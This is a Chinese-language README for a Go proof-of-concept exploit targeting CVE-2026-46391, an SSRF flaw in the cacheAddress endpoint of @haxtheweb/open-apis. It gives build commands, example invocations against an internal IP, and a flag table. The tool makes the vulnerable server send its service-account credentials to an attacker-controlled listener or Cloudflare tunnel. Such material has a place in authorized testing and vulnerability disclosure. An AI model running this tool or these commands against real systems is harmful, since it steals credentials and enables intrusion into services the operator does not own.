CVE-2026-46391 的概念验证。触发 @haxtheweb/open-apis 中 cacheAddress 端点的 SSRF 漏洞,并捕获回调中发送的服务账户凭证。

go build -o cve-2026-46391 .
go test ./...
./cve-2026-46391 -u <web根目录> -l <监听地址> [-p 端口] [-t 秒] [-v]
直接连接(与目标在同一网络):
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201
通过 VPS/Cloudflare 隧道等:
./cve-2026-46391 -u http://10.10.0.80:3000 -l https://random-words.trycloudflare.com
自定义端口和超时:
./cve-2026-46391 -u http://10.10.0.80:3000 -l 10.10.15.201 -p 9090 -t 60
| 标志 | 描述 | 默认值 |
|---|
-u, --url | 目标 Web 根目录(例如 http://10.10.0.80:3000) | 必需 |
-l, --listener | 您的 IP/主机名或隧道 URL(例如 192.168.1.10、https://uuid.trycloudflare.com) | 必需 |
-p, --port | 本地监听端口 | 8080 |
-t, --timeout | 等待回调的秒数 | 30 |
-v, --verbose | 打印每个入站请求的头部和正文 | 关闭 |